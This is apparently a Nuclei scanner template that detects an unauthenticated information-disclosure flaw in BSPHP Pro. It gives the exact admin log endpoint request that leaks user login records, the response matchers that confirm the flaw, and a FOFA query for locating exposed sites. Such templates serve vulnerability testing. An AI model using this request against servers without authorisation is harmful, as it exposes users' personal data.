39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: bsphp-info
|
|
|
|
info:
|
|
name: BSPHP - Information Disclosure
|
|
author: ritikchaddha
|
|
severity: low
|
|
description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: title="BSPHP"
|
|
tags: bsphp,info,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{"data":'
|
|
- '"id"'
|
|
- '"user"'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|